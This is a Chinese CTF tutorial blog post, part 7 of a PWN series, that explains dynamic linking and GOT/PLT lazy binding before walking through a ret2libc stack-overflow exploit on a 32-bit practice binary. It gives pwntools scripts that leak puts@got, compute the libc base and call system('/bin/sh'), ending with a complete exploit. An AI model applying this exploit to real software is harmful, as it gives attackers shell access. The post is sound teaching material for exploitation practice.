前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >PWN从入门到放弃(7)——栈溢出之ret2libc

PWN从入门到放弃(7)——栈溢出之ret2libc

作者头像
山深有杏
发布2024-01-30 14:20:41
8920
发布2024-01-30 14:20:41
举报
文章被收录于专栏:CTF新手教程

之前我们介绍了ret2text和ret2shellcode,这篇给大家介绍一下ret2libc。

ret2libc这种攻击方式主要是针对动态链接(Dynamic linking) 编译的程序,因为正常情况下是无法在程序中找到像 system() 、execve() 这种系统级函数(如果程序中直接包含了这种函数就可以直接控制返回地址指向他们,而不用通过这种麻烦的方式)。

0x00 动态链接

什么是动态链接

动态链接是指在程序装载时通过动态链接器将程序所需的所有动态链接(Dynamic linking library) 装载至进程空间中( 程序按照模块拆分成各个相对独立的部分),当程序运行时才将他们链接在一起形成一个完整程序的过程。

它诞生的最主要的的原因就是静态链接太过于浪费内存和磁盘的空间,并且现在的软件开发都是模块化开发,不同的模块都是由不同的厂家开发,在静态链接的情况下,一旦其中某一模块发生改变就会导致整个软件都需要重新编译,而通过动态链接的方式就推迟这个链接过程到了程序运行时进行。

动态链接的好处
节省内存、磁盘空间

例如磁盘中有两个程序,p1、p2,且他们两个都包含lib.o这个模块,在静态链接的情况下他们在链接输出可执行文件时都会包含lib.o这个模块,这就造成了磁盘空间的浪费。当这两个程序运行时,内存中同样也就包含了这两个相同的模块,这也就使得内存空间被浪费。当系统中包含大量类似lib.o这种被多个程序共享的模块时,也就会造成很大空间的浪费。在动态链接的情况下,运行p1,当系统发现需要用到lib.o,就会接着加载lib.o。这时我们运行p2,就不需要重新加载lib.o了,因为此时lib.o已经在内存中了,系统仅需将两者链接起来,此时内存中就只有一个lib.o节省了内存空间。

程序更新更简单

第三方更新lib.o后,理论上只需要覆盖掉原有的lib.o,就不必重新链接整个程序,在程序下一次运行时,新版本的目标文件就会自动装载到内存并且链接起来,就完成了升级的目标。

增强程序扩展性和兼容性

动态链接的程序在运行时可以动态地选择加载各种模块,也就是我们常常使用的插件。软件的开发商开发某个产品时会按照一定的规则制定好程序的接口,其他开发者就可以通过这种接口来编写符合要求的动态链接文件,以此来实现程序功能的扩展。增强兼容性是表现在动态链接的程序对不同平台的依赖差异性降低,比如对某个函数的实现机制不同,如果是静态链接的程序会为不同平台发布不同的版本,而在动态链接的情况下,只要不同的平台都能提供一个动态链接库包含该函数且接口相同,就只需用一个版本了。

总而言之,动态链接的程序在运行时会根据自己所依赖的动态链接库,通过动态链接器将他们加载至内存中,并在此时将他们链接成一个完整的程序。Linux系统中,ELF动态链接文件被称为动态共享对象(Dynamic Shared Objects),简称共享对象一般都是以 “.so” 为扩展名的文件,在pwn中我们常称之为libc库;在windows系统中就是常常软件报错缺少xxx.dll文件。

0x01 GOT表&PLT表

GOT(Global Offset Table,全局偏移表)是Linux ELF文件中用于定位全局变量和函数的一个表。PLT(Procedure Linkage Table,过程链接表)是Linux ELF文件中用于延迟绑定的表,即函数第一次被调用的时候才进行绑定。

延迟绑定

所谓延迟绑定,就是当函数第一次被调用的时候才进行绑定(包括符号查找、重定位等),如果函数从来没有用到过就不进行绑定。基于延迟绑定可以大大加快程序的启动速度,特别有利于一些引用了大量函数的程序。

延迟绑定的基本原理

假如存在一个puts函数,这个函数在PLT中的条目为puts@plt,在GOT中的条目为puts@got,那么在第一次调用puts函数的时候,首先会跳转到PLT表,伪代码如下:

代码语言:javascript
复制
puts@plt:
    jmp puts@got
    patch puts@got

这里会从PLT跳转到GOT,如果函数从来没有调用过,那么这时候GOT会跳转回PLT并调用patch puts@got,这一行代码的作用是将puts函数真正的地址填充到puts@got,然后跳转到puts函数真正的地址执行代码。当我们下次再调用puts函数的时候,执行路径就是先后跳转到puts@plt、puts@got、puts真正的地址。

也就是说,PLT表和GOT表是一一对应的,GOT表中存的是函数的实际地址,而PLT表中存的是函数GOT表的地址。

0x02 ret2libc

一般来说,在我们做题的时候,会给两个文件,一个是elf程序文件,另一个则是libc库文件。不过有的题目也不会给出libc库,需要我们根据函数在libc库中的偏移量来查找对应的libc库。

计算libc基址

libc基地址 = 函数实际地址 – 函数在libc库中的偏移地址

system_addr = libc基地址 + system在libc库中的偏移地址

利用ret2libc需解决的问题
  • 程序中有可输出地址内容的函数,如:puts();
  • 计算libc基址;
  • 找到 system() 函数的地址;
  • 找到 “/bin/sh” 这个字符串的地址。

0x03 例题

题目附件下载

1) 查看文件信息

按照国际惯例,先查看文件信息

代码语言:javascript
复制
$ file diqiandao
$ checksec diqiandao

32位程序,开启了NX保护。

2) 查看程序流程

运行一下程序,看看程序的大概流程

程序获取一次用户输入

3) 分析程序&查找漏洞点

将程序扔到ida pro里分析

首先分析main()函数

代码语言:javascript
复制
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+1Ch] [ebp-64h]

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("No surprise anymore, system disappeard QQ.");
  printf("Can you find it !?");
  gets(&s);
  return 0;
}

我们看到main()函数中,有puts()函数和gets()函数,这里gets()函数是存在溢出的,我们可以利用这个溢出,构造一个puts()函数,将函数实际地址打印出来。

但是这里存在一个问题,我们这个程序只提供一次用户输入,而我们至少需要两次输入(一次用来获取函数实际地址,一次用来发送payload)。所以,我们构造puts()函数时需要加上返回地址,返回到main()函数,让我们可以再次输入。

4) 构造payload

首先,和之前一样,简单的栈溢出,只不过返回到puts()函数上,顺便加上puts()函数的参数。

代码语言:javascript
复制
from pwn import *

r = process('./diqiandao')
elf = ELF('./diqiandao')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')

main_addr = 0x08048618
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

padding = 112

payload = 'a' * padding
payload += p32(puts_plt)
payload += p32(main_addr)
payload += p32(puts_got)

r.sendlineafter('?',payload)

r.interactive()

注:这里需要注意一下,在本地调试的时候,程序调用的libc库是当前虚拟机的libc库,因此,写payload的时候,需要导入虚拟机的libc库,而不是题目给出的libc库。在本地调试成功后,将libc库换成题目给的,然后执行脚本即可。

这里可使用ldd命令来查看当前程序所使用的libc库地址。

计算偏移量和覆盖返回地址不再演示,和之前一样,这里主要讲解一下payload的构造。

32位ELF程序通过栈来传递参数,而64位ELF程序则是通过rdi寄存器来传递参数。

这道题是32位ELF程序,因此,我们需要构造一个栈结构。之前我们讲过栈帧的结构,我们只需要按照栈帧结构来构造即可。先构造main()函数,造成溢出,然后构造puts()函数。

只需要按照1,2,3,4的顺序来写payload。

先来运行一下脚本。

可以看到,已经给我们打印了一个二进制格式的数据,这就是puts()函数给我们返回的puts@got的值,也就是puts函数的实际地址。我们只需要将其u32解包就可以得到一个16进制地址。

程序执行完puts()函数之后也成功返回到main()函数,我们可以再次利用main()函数的栈溢出漏洞来进行第二段payload的发送。

接下来我们继续构造我们的payload。

首先将地址解包,这里我们需要用到pwntools的recv()。

代码语言:javascript
复制
puts_real_addr = u32(r.recv(4))
print hex(puts_real_addr)

因为32位程序的地址是4个字节,因此我们这里r.recv(4)表示接收4个字节的数据,并通过u32()来解包。

我们已经成功将puts函数的实际地址打印出来。

那么接下来就简单许多,我们需要计算libc的基地址,并利用libc基地址来计算system()函数和/bin/sh字符串的地址。然后利用mian()函数的栈溢出漏洞,溢出到我们构造好的system()函数上即可。

先计算libc基地址,并打印一下看看。

代码语言:javascript
复制
libc_base = puts_real_addr - libc.symbols['puts']
print hex(libc_base)

我们看到,打印出来的libc基地址后三位是0,证明我们没有计算错误,若后三位不是0,说明计算的有问题。

接下来计算system()和/bin/sh的地址。

代码语言:javascript
复制
system_addr = libc_base + libc.symbols['system']
bin_sh_addr = libc_base + libc.search('/bin/sh').next()

这两个地址大家记住就好,所有题都可以这么写。

接下来构造system()函数,和puts()函数一样,system()函数也只有一个参数,因为这里不需要再次返回到main()函数,所以返回地址我们可以随便写。

代码语言:javascript
复制
payload_2 = 'a' * padding
payload_2 += p32(system_addr)
payload_2 += p32(0xdeedbeef)
payload_2 += p32(bin_sh_addr)

sleep(1)
r.sendline(payload_2)

我们运行一下脚本

我们看到程序异常退出了,并没有给我们返回shell,这里我们用gdb动态调试一下。

在脚本前加上这两句,并在运行脚本时加上G,即可开启动态调试。

代码语言:javascript
复制
context.terminal = ['tmux', 'splitw', '-h']
if args.G:
        gdb.attach(proc.pidof(r)[0])
代码语言:javascript
复制
$ python exp.py G

pwntools会自动在新的终端窗口中帮我们开启GDB动态调试。

注:这里大家要是不能开启新窗口,请下载安装tmux,或者根据你当前的终端来修改context.terminal的参数。

我们在GDB窗口中输入c,让脚本继续运行。

我们看到程序在一个奇怪的地址被中断了。我们查看寄存器窗口,EIP指向0x61616161,也就是’aaaa’,我们再看堆栈窗口

代码语言:javascript
复制
00:0000│ esp  0xffb87b38 ◂— 0x61616161 ('aaaa')
01:0004│      0xffb87b3c —▸ 0xf75ebda0 (system) ◂— sub    esp, 0xc
02:0008│      0xffb87b40 ◂— 0xdeadbeef
03:000c│      0xffb87b44 —▸ 0xf770ca0b ◂— das     /* '/bin/sh' */
04:0010│      0xffb87b48 —▸ 0xf7763000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
05:0014│      0xffb87b4c —▸ 0xf77abc04 ◂— 0x0
06:0018│      0xffb87b50 —▸ 0xf77ab000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x23f40
07:001c│      0xffb87b54 ◂— 0x0

esp寄存器当前指向也是0x61616161,也是’aaaa’,再往下就是我们构造的payload_2,也就是说,我们第二次调用main()函数时,他的偏移量不是之前的112了,而是112-8,我们修改一下payload_2

代码语言:javascript
复制
payload_2 = 'a' * (padding - 8)
payload_2 += p32(system_addr)
payload_2 += p32(0xdeedbeef)
payload_2 += p32(bin_sh_addr)

sleep(1)
r.sendline(payload_2)

执行脚本

成功拿到shell。

0x04 完整exp

代码语言:javascript
复制
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
r = process('./diqiandao')
elf = ELF('./diqiandao')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')

if args.G:
        gdb.attach(proc.pidof(r)[0])

main_addr = 0x08048618
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
#puts_addr = elf.symbols['puts']

padding = 112

payload = 'a' * padding
payload += p32(puts_plt)
payload += p32(main_addr)
payload += p32(puts_got)

r.sendlineafter('?',payload)

puts_real_addr = u32(r.recv(4))
#print hex(puts_real_addr)

libc_base = puts_real_addr - libc.symbols['puts']
print hex(libc_base)

system_addr = libc_base + libc.symbols['system']
bin_sh_addr = libc_base + libc.search('/bin/sh').next()

payload_2 = 'a' * (padding - 8)
payload_2 += p32(system_addr)
payload_2 += p32(0xdeedbeef)
payload_2 += p32(bin_sh_addr)

sleep(1)
r.sendline(payload_2)

r.interactive()
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x00 动态链接
    • 什么是动态链接
      • 动态链接的好处
        • 节省内存、磁盘空间
        • 程序更新更简单
        • 增强程序扩展性和兼容性
    • 0x01 GOT表&PLT表
      • 延迟绑定
        • 延迟绑定的基本原理
        • 0x02 ret2libc
          • 计算libc基址
            • 利用ret2libc需解决的问题
            • 0x03 例题
              • 1) 查看文件信息
                • 2) 查看程序流程
                  • 3) 分析程序&查找漏洞点
                    • 4) 构造payload
                    • 0x04 完整exp
                    领券
                    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档